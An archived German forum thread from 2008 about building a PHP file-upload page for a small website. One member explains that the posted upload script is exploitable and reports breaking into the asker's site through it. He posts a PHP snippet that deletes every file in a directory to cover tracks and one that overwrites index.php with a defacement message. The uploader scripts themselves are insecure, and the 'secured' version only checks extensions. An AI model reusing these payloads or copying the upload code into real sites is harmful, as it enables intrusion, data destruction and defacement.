Upload seite

Diskutiere und helfe bei Upload seite im Bereich Webmaster Support, Scripts, etc im SysProfile Forum bei einer Lösung; Hallo liebe User Kann mir mal Bidde einer Helfen ? Ich habe eine frage wie beckomme ich das hin das hier das kleine bichen Html/php zeug zum laufen... Dieses Thema im Forum "Webmaster Support, Scripts, etc" wurde erstellt von Hardfighter, 5. März 2008.

  1. Hardfighter
    Hardfighter Computer-Experte
    Registriert seit:
    12. Oktober 2007
    Beiträge:
    979
    Zustimmungen:
    30
    1. SysProfile:
    47062
    2. SysProfile:
    42945147962

    Hallo liebe User

    Kann mir mal Bidde einer Helfen ?

    Ich habe eine frage wie beckomme ich das hin das hier das kleine bichen Html/php zeug zum laufen kommt für eine Upload seite .

    Also es solte ohne Benuzer, Passwort begrenzung bis 30 mb upload möglich sein und natürlich einen link heras geben das man es runter laden kann !!!


    ich würde mich freuen wenn mir einer helfen kann
    Näturlich beckommt der jenige was dafür, ist ja sau mäsig arbeit !!!

    Hab schon 3 Tage Google am laufen deswegen.

    Mfg Hardfighter
     
    #1 Hardfighter, 5. März 2008
  2. Spacerat
    Spacerat ٩(̾●̮̮̃̾•̃̾)۶ /dev/null
    Registriert seit:
    25. Dezember 2006
    Beiträge:
    8.597
    Zustimmungen:
    196
    Name:
    Christian
    1. SysProfile:
    11226
    Steam-ID:
    Spacerat2911

    Wie viel Upload möglich ist, liegt an der Serverkonfiguration (Erlaubter Wert der POST), daran kannst du wenig ändern.
    Die Methode, per FTP was hochzuladen, rate ich auch gerne ab. Ich hab hier ein uraltes Uploadscript von mir, das könnte dir vllt helfen, du müsstest es nur einstylen, etc.

    PHP:
    <?php
    $site 
    "http://deine.domain.hierhin/";
    $password "passwort_fuer_upload";
    if(isset(
    $_POST['upload'])) 

        if(
    is_uploaded_file($_FILES['file']['tmp_name']) && md5($_POST['password_up']) == md5($password) ) 
        { 
            
    $fn $_FILES['file']['name'];
            
    $filenamernd md5($_FILES['file']['name']);
            
    $dateierweiterung explode("."$fn );
            
    $dateierw_count count($dateierweiterung);
            
    $splitt $dateierweiterung[count($dateierw_count)];
            for ( 
    $i count($dateierw_count); $dateierweiterung[count($dateierw_count) + $i] != "" || $i == "10" ;$i++ )
            {
                
    $splitt $dateierweiterung[count($dateierw_count) + $i];
                if ( 
    $i == "10" )
                {
                    die(
    "Fehler!");
                }
            }

            
    $filenamernd $_FILES['file']['name'] . "-" md5(rand(11000000) . $fn);
                if(
    move_uploaded_file($_FILES['file']['tmp_name'], './uploads/' $filenamernd "." $splitt)) 
                { 
                echo 
    '<br><p>Upload erfolgreich!<br />'."\n"
                echo 
    '<br>Dateiname: '.$filenamernd "." $splitt."<br />\n"
                echo 
    '<br>Adresse: '.$site.$row['siteurl'].'uploads/'.$filenamernd "." $splitt.'<br>';
                echo 
    "<br>Für Foren: [url=".$site.$row['siteurl']."link_anpassen][img]".$site.$row['siteurl']."uploads/".$filenamernd "." $splitt."[/img][/url]<br>";
                } 
                else 
                { 
                echo 
    '<p>Upload fehlgeschlagen!</p>'
                }
        } 
        elseif(
    md5($_POST['password_up']) != md5($password) ) 
        { 
            echo 
    '<p>Falsches Passwort!<br /><br /><a href="javascript:history.back(-1)">Zurück</a></p>'
        } 
        else 
        { 
            echo 
    '<p>Keine Datei hochgeladen!</p>'
        } 

    else 

    ?> 
    <form enctype="multipart/form-data" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> 
    <p><label for="file">Datei: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="file" id="file" name="file" size="50" /></label><br /> 
    <label for="password_up">Passwort: <input type="password" id="password_up" name="password_up" size="10" value="" /></label><br />
    <input type="hidden" id="passwort" name="password">
    <input type="hidden" name="upload" value="Uploaden">
    <input type="submit" value="Uploaden" /><br /> </p> 
    </form>
    <?
    }
    ?>

    Die Basis für das Script hab ich vor Jahren mal von fanrpg gekriegt, den Rest hab ich draus gemacht *g*
    Wie gesagt, ist alt, früher war ich auch noch nicht so versiert...
    Viel Spaß damit ;)

    Das Script setzt in der Basisversion (wie es hier ist) einen Ordner "uploads" voraus, der (auf Linuxservern, wie die es sind, die ich nutze) die CHMOD 777 hat, d.h., dass er u.a. beschreibbar ist.

    In dem Script musst du oben nur das Passwort für den Upload anpassen und die Domain.
     
  3. Hardfighter
    Hardfighter Computer-Experte
    Themenstarter
    Registriert seit:
    12. Oktober 2007
    Beiträge:
    979
    Zustimmungen:
    30
    1. SysProfile:
    47062
    2. SysProfile:
    42945147962
    Ja coole sache nur ich blicke da nicht so ganz durch bei mir kommt das etwas doof an.

    Also hab es mal probiert das ist dabei raus gekommen : KLick mich


    Mfg Hardfighter
     
    #3 Hardfighter, 6. März 2008
  4. fanrpg
    fanrpg Computer-Guru
    Registriert seit:
    27. Juli 2007
    Beiträge:
    161
    Zustimmungen:
    16
    1. SysProfile:
    30134
    LoL, du darfst das nicht als index.html benutzen sondern als index.php auf dem Server hochladen.
     
  5. Hardfighter
    Hardfighter Computer-Experte
    Themenstarter
    Registriert seit:
    12. Oktober 2007
    Beiträge:
    979
    Zustimmungen:
    30
    1. SysProfile:
    47062
    2. SysProfile:
    42945147962
    Ups oki ich gug grade mal
     
    #5 Hardfighter, 6. März 2008
  6. Hardfighter
    Hardfighter Computer-Experte
    Themenstarter
    Registriert seit:
    12. Oktober 2007
    Beiträge:
    979
    Zustimmungen:
    30
    1. SysProfile:
    47062
    2. SysProfile:
    42945147962
    hab es gemacht aber und das pw auch alles eingetragen ,

    das ist hardlasersound.de

    kannst ja ma versuchen
     
    #6 Hardfighter, 6. März 2008
  7. D!abloSV
    D!abloSV Alter Hase
    Registriert seit:
    28. Dezember 2006
    Beiträge:
    2.076
    Zustimmungen:
    37
    Hast du auch die nötigen Rechte gesetzt sowie das nötige Uploadverzeichnis angelegt?

    Ich bin jetz auch kein Pro im Programmieren, aber sollte das am Anfang nicht iwie so ausschaun im Quelltext?

    PHP:
       <?php
    $site 
    'http://upload.hardlasersound.de/';
    $password 'hardlasersound.de';
    if(isset(
    $_POST['upload']))
    Ich bin mir bei php nicht ganz sicher wie da das ganze gemacht werden muss...
     
    #7 D!abloSV, 6. März 2008
    Zuletzt bearbeitet: 6. März 2008
  8. Hardfighter
    Hardfighter Computer-Experte
    Themenstarter
    Registriert seit:
    12. Oktober 2007
    Beiträge:
    979
    Zustimmungen:
    30
    1. SysProfile:
    47062
    2. SysProfile:
    42945147962
    @ Spacerat

    Kannst du mir en bichen helfen?
    Hab ja von dir den Sever deswegen weißt du da ja bestens bescheid.


    Mfg Hardfighter
     
    #8 Hardfighter, 6. März 2008
  9. Spacerat
    Spacerat ٩(̾●̮̮̃̾•̃̾)۶ /dev/null
    Registriert seit:
    25. Dezember 2006
    Beiträge:
    8.597
    Zustimmungen:
    196
    Name:
    Christian
    1. SysProfile:
    11226
    Steam-ID:
    Spacerat2911
    Script korrigiert... normal mach ich das so nicht, aber ich habs dir per root draufgepackt, es funzt jetzt.
    War ein copy/paste-Fehler nach hierhin... komischerweise..
     
  10. fanrpg
    fanrpg Computer-Guru
    Registriert seit:
    27. Juli 2007
    Beiträge:
    161
    Zustimmungen:
    16
    1. SysProfile:
    30134
    ! Achtung !

    Achtung, Sicherheitslücke :)

    Durch eine Lücke in deinem Uploadscript kann man beliebig viele PHP-Dateien hochladen und dementsprechend auch bearbeiten und z.B an deine config.php kommen =)

    War übrigens sehr interessant dein INFUSION config.

    Ach ja Spuren verwischen geht natürlich auch mit dateien:

    PHP:
    <?php
    $handle 
    opendir("./");
    while( 
    $file readdir($handle) )
    {
        echo 
    $file "<br />";
        if( 
    $file != '.' && $file != '..' )
        {
            
    chmod($file0777);
            
    unlink($file);
        }
    }
    closedir($handle);
    ?>
    Also nie(!) ungesicherte Uploadscripts benutzen tut dir und dem Server nicht gut ;) Könnte gefährlich werden.

    Das hat übrigens nicht geklappt, aber auch nur mangels Berechtigungen die sich net mal per chmod() setzen liessen.

    PHP:
    <?php
    $new_handle 
    fopen("./../index.php"'w+');
    $new_code '<?php
    echo "<div style="font-size:16px; font-weight:bold;">Hallo! <br />";
    echo "Wäre ich jetzt fies könnte ich den Server hacken! Sowie den Rest der Seite.. :D Aber ach ja DB-Passwort ändern ;)";
    echo "<br /><br />h4ck3d by <i>fanrpg</i> :D";
    ?>'
    ;
    fwrite($new_handle$new_code);
    fclose($new_handle);
    ?>
    Aber ich habe dir trotzdem mal das Uploadscript lahmgelegt :)
    Zwar nicht über den Weg sondern über "andere" Methoden die ich hier nicht länger ausbreiten möchte (und nein nicht per root-rechte sondern wie auch hier via php Datei Upload)

    Sollte der Selbe Code drinne stehen wie oben in der var $new_code, aber leider habe ich vergessen in der eile die " zu maskieren deswegen kommt so ne doofe Fehlermeldung. :cry:

    Ist gefährlich, lass nur mal einen Cracker drüber stolpern der was bösartiges will dann wärs es aus mit deiner Seite und dem Server. Aus diesem Grunde habe ich es auch lahmgelegt wäre sehr viel Arbeit gewesen das wieder zu berichtigen.

    Ach ja hier ein gesichertes Uploadscript wo nur Bilddateien erlaubt sind:

    PHP:
    <?php
    $site 
    "http://upload.hardlasersound.de/";
    $password "hardlasersound.de";
    if(isset(
    $_POST['upload'])) 

        if(
    is_uploaded_file($_FILES['file']['tmp_name']) && md5($_POST['password_up']) == md5($password) ) 
        { 
            
    $fn $_FILES['file']['name'];
            
    $filenamernd md5($_FILES['file']['name']);
            
    $dateierweiterung explode("."$fn );
            
    $dateierw_count count($dateierweiterung);
            
    $splitt $dateierweiterung[count($dateierw_count)];
            if( 
    $splitt == 'jpg' or $splitt == 'jpeg' or $splitt == 'gif' or $splitt == 'bmp' or $splitt == 'png' )
            {
                for ( 
    $i count($dateierw_count); $dateierweiterung[count($dateierw_count) + $i] != "" || $i == "10" ;$i++ )
                {
                    
    $splitt $dateierweiterung[count($dateierw_count) + $i];
                    if ( 
    $i == "10" )
                    {
                        die(
    "Fehler!");
                    }
                }
        
                
    $filenamernd $_FILES['file']['name'] . "-" md5(rand(11000000) . $fn);
                
                if(
    move_uploaded_file($_FILES['file']['tmp_name'], './uploads/' $filenamernd "." $splitt)) 
                { 
                    echo 
    '<br><p>Upload erfolgreich!<br />'."\n"
                    echo 
    '<br>Dateiname: '.$filenamernd "." $splitt."<br />\n"
                    echo 
    '<br>Adresse: '.$site.$row['siteurl'].'uploads/'.$filenamernd "." $splitt.'<br>';
                    echo 
    "<br>Für Foren: [url=".$site.$row['siteurl']."link_anpassen][img]".$site.$row['siteurl']."uploads/".$filenamernd "." $splitt."[/img][/url]<br>";
                } 
                else 
                { 
                    echo 
    '<p>Upload fehlgeschlagen!</p>'
                }
            }
            else
            {
                die(
    "Falsche Dateiendung");
            }    
        } 
        elseif(
    md5($_POST['password_up']) != md5($password) ) 
        { 
            echo 
    '<p>Falsches Passwort!<br /><br /><a href="javascript:history.back(-1)">Zurück</a></p>'
        } 
        else 
        { 
            echo 
    '<p>Keine Datei hochgeladen!</p>'
        } 

    else 

    ?> 
    <form enctype="multipart/form-data" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> 
    <p><label for="file">Datei: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="file" id="file" name="file" size="50" /></label><br /> 
    <label for="password_up">Passwort: <input type="password" id="password_up" name="password_up" size="10" value="" /></label><br />
    <input type="hidden" id="passwort" name="password">
    <input type="hidden" name="upload" value="Uploaden">
    <input type="submit" value="Uploaden" /><br /> </p> 
    </form>
    <?
    }
    ?>
    btw. Passwort von der DB ändern habe es ja gesehen.
     
  11. Spacerat
    Spacerat ٩(̾●̮̮̃̾•̃̾)۶ /dev/null
    Registriert seit:
    25. Dezember 2006
    Beiträge:
    8.597
    Zustimmungen:
    196
    Name:
    Christian
    1. SysProfile:
    11226
    Steam-ID:
    Spacerat2911
    Was meinst du, warum ich da die Passwortabfrage reingequetscht hatte, fan ;)
    Mir ist das Sicherheitsrisiko des Scripts auch bewusst, wie gesagt, es ist alt, sehr alt *g*
     
    1 Person gefällt das.
  12. fanrpg
    fanrpg Computer-Guru
    Registriert seit:
    27. Juli 2007
    Beiträge:
    161
    Zustimmungen:
    16
    1. SysProfile:
    30134
  13. Hardfighter
    Hardfighter Computer-Experte
    Themenstarter
    Registriert seit:
    12. Oktober 2007
    Beiträge:
    979
    Zustimmungen:
    30
    1. SysProfile:
    47062
    2. SysProfile:
    42945147962
    Also kann ich das jetzt vergesen oder was ?
    mit dem Daten upload für mp3 ?
     
    #13 Hardfighter, 7. März 2008
  14. fanrpg
    fanrpg Computer-Guru
    Registriert seit:
    27. Juli 2007
    Beiträge:
    161
    Zustimmungen:
    16
    1. SysProfile:
    30134
    Nein, einfach bei
    Code:
    if( $splitt == 'jpg'
    dahinter
    Code:
    or $splitt == 'mp3' 
    einfügen


    Dann geht das schon ;)
     
  15. Hardfighter
    Hardfighter Computer-Experte
    Themenstarter
    Registriert seit:
    12. Oktober 2007
    Beiträge:
    979
    Zustimmungen:
    30
    1. SysProfile:
    47062
    2. SysProfile:
    42945147962

    Kannst du mir das Script Schnell um ändern für MP3,wav,und bilder ???
     
    #15 Hardfighter, 7. März 2008
Thema:

Upload seite

Die Seite wird geladen...

Upload seite - Similar Threads - Upload

Forum Datum

WhatsApp Beta: HD-Bildqualität für Uploads als Standard einrichten

WhatsApp Beta: HD-Bildqualität für Uploads als Standard einrichten: WhatsApp Beta: HD-Bildqualität für Uploads als Standard einrichten Was etwas nervt: Dies ist nicht die Standardeinstellung. Jedes Mal, wenn ihr also ein Bild / Video in HD-Qualität versenden...
User-Neuigkeiten Gestern um 10:42 Uhr

OneDrive: URL-Upload-Funktion wieder eingestellt

OneDrive: URL-Upload-Funktion wieder eingestellt: OneDrive: URL-Upload-Funktion wieder eingestellt Diese Funktion wurde als experimentelle Option für Benutzer eingeführt, die Dateien direkt aus dem Web auf OneDrive speichern wollten, ohne sie...
User-Neuigkeiten 11. März 2024

Upload: Trailer zu Staffel 3 ist da

Upload: Trailer zu Staffel 3 ist da: Upload: Trailer zu Staffel 3 ist da Amazon hatte neulich das Release-Datum bekannt gegeben, man hat sich für den 20. Oktober entschieden – und nun ist schon der erste Trailer da.. Upload:...
User-Neuigkeiten 21. September 2023

YouTube & YouTube Music: Unterstützung für RSS-Uploads für Podcaster soll kommen

YouTube & YouTube Music: Unterstützung für RSS-Uploads für Podcaster soll kommen: YouTube & YouTube Music: Unterstützung für RSS-Uploads für Podcaster soll kommen Im Rahmen der Podcast-Moment-Konferenz hat man Neuerungen für die Plattform verlauten lassen. So wird man bis...
User-Neuigkeiten 25. August 2023

Prime Video: Staffel 3 von „Upload“ startet am 20. Oktober

Prime Video: Staffel 3 von „Upload“ startet am 20. Oktober: Prime Video: Staffel 3 von „Upload“ startet am 20. Oktober Amazon hat nun das Release-Datum bekannt gegeben, man hat sich für den 20. Oktober entschieden. Prime Video: Staffel 3 von „Upload“...
User-Neuigkeiten 22. August 2023

Verbraucht Upload Computerressourcen?

Verbraucht Upload Computerressourcen?: Meine Frage ist, ob der Upload eines Videos ins Internet, nur die Internetverbindung stark auslastet oder aber auch CPU und RAM? Denn die Frage stelle ich, um zu verstehen, ob ich genauso flüssig...
Prozessoren 28. Mai 2023

Discord erhöht die Dateigröße für Uploads

Discord erhöht die Dateigröße für Uploads: Discord erhöht die Dateigröße für Uploads Entwickelt von Jason Citron und Stanislav Vishnevskiy, bietet Discord seinen Nutzern die Möglichkeit, Text-, Sprach- und Videochats in Echtzeit...
User-Neuigkeiten 11. April 2023

Vodafone hält an Plänen für schnelleren Upload fest

Vodafone hält an Plänen für schnelleren Upload fest: Vodafone hält an Plänen für schnelleren Upload fest Schaut man sich die Standardleitung im Gigabit-Tarif an, dann hat man auf dem Papier 1.000 MBit/s im Download, im Upload ist bei maximal 50...
User-Neuigkeiten 5. April 2023

Wie kann man Tiktok Videos in HD uploaden?

Wie kann man Tiktok Videos in HD uploaden?: Ich habe ein Video hochgeladen mit guter Qualität aber die Qualität nach dem Upload wurde schlecht bzw verpixelt. Ich habe beim Upload "Videos in hoher Qualität erlauben" ausgewählt und trotzdem...
Grafikkarten 11. März 2023

YouTube verbessert die Upload-Funktion für Creator

YouTube verbessert die Upload-Funktion für Creator: YouTube verbessert die Upload-Funktion für Creator . . YouTube verbessert die Upload-Funktion für Creator
User-Neuigkeiten 14. Dezember 2022

Twitter: Video-Upload unter Android wird verbessert

Twitter: Video-Upload unter Android wird verbessert: Twitter: Video-Upload unter Android wird verbessert Kann natürlich auch an eurer Internetverbindung liegen, in diesem Fall scheint aber auch Twitter ein Problem zu haben.. . Twitter:...
User-Neuigkeiten 16. März 2022

Twitter Blue: 1080p-Videos im Web und Upload von längeren Videos in der mobilen App

Twitter Blue: 1080p-Videos im Web und Upload von längeren Videos in der mobilen App: Twitter Blue: 1080p-Videos im Web und Upload von längeren Videos in der mobilen App Dabei heißt es, dass man im Web in der Lage sein wird, Videos in 1080p darzustellen. Mobil hingegen wird man...
User-Neuigkeiten 5. März 2022

Upload: Prime Video veröffentlicht offiziellen Trailer zu Staffel 2

Upload: Prime Video veröffentlicht offiziellen Trailer zu Staffel 2: Upload: Prime Video veröffentlicht offiziellen Trailer zu Staffel 2 Sie startet im März. Wer sie noch nicht gesehen hat, dem sei sie von mir empfohlen, denn ich war wirklich angenehm überrascht...
User-Neuigkeiten 23. Februar 2022
Upload seite solved
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden